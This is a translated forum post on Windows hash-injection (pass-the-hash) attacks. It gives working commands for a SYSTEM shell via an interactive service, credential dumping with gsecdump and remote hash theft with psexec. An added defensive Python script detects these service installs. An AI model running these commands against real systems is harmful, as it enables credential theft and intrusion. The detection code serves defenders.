Hash Injection Attack
Source: Internet  Editor: 程序博客网  Time: 2024/06/02 22:19
Author: pt007[at]vip.sina.com
Source: 邪恶八进制信息安全团队 (Evil Octal Information Security Team, www.eviloctal.com)
Download URL:
http://www.truesec.com/PublicSto ... tectCookieSupport=1
To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
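A tip: you can use iam from the pshtools toolkit to import the hash information just captured with gsecdump into the local lsass process, which carries out the hash injection attack. The foreigners really are good at this; administrators are going to be busy now. LM/NT hashes obtained during ARP spoofing, as well as those obtained with gethash, do not actually need to be cracked at all; this is the tool for making use of them. The original article puts it well: whether the password is 4 characters or 127 characters long, once you have the hash, it is 100% done.
Original article: http://truesecurity.se/blogs/mur ... -text-password.aspx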
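
On the defensive side, the session above leaves two service-installation artifacts: a short-lived service whose binary is cmd.exe with the interactive type, and the PsExec service on the remote host. The following is an added example, not part of the original post, that triages service-install records for both. The record layout is an assumption modelled on the fields of Windows Security event 4697, and the sample records are constructed.

```python
import ntpath
import re

SERVICE_INTERACTIVE_PROCESS = 0x100   # service type bit set by "type= interact"
SHELLS = {"cmd.exe", "powershell.exe"}
PSEXEC_NAMES = {"psexesvc", "psexesvc.exe"}  # PsExec's default service / binary name

def image_name(command_line):
    """Lower-cased executable name from a service command line (quoted or not)."""
    m = re.match(r'\s*(?:"([^"]+)"|(.+?\.exe)\b)', command_line, re.I)
    exe = (m.group(1) or m.group(2)) if m else (command_line.split() or [""])[0]
    return ntpath.basename(exe).lower()

def triage(record):
    """Return the list of reasons a service-install record looks suspicious."""
    reasons = []
    exe = image_name(record["ServiceFileName"])
    if exe in SHELLS:
        reasons.append("service binary is a command interpreter")
    if int(record["ServiceType"], 16) & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("interactive service type")
    if record["ServiceName"].lower() in PSEXEC_NAMES or exe in PSEXEC_NAMES:
        reasons.append("PsExec remote-execution service")
    return reasons

def scan(records):
    """Map service name -> reasons, for flagged records only."""
    return {r["ServiceName"]: why for r in records if (why := triage(r))}

# Constructed sample records (field names assumed, modelled on event 4697).
SAMPLE = [
    {"ServiceName": "shellcmdline", "ServiceType": "0x110", "ServiceAccount": "LocalSystem",
     "ServiceFileName": r"C:\WINDOWS\system32\cmd.exe /K start"},
    {"ServiceName": "PSEXESVC", "ServiceType": "0x10", "ServiceAccount": "LocalSystem",
     "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe"},
    {"ServiceName": "VendorAgent", "ServiceType": "0x10", "ServiceAccount": "LocalSystem",
     "ServiceFileName": r'"C:\Program Files\Vendor\agent.exe" --service'},
]

if __name__ == "__main__":
    for name, why in scan(SAMPLE).items():
        print(f"{name}: {'; '.join(why)}")
```

Because the service in the session is deleted right after it starts, a later audit of installed services would miss it; the install record is where it remains visible.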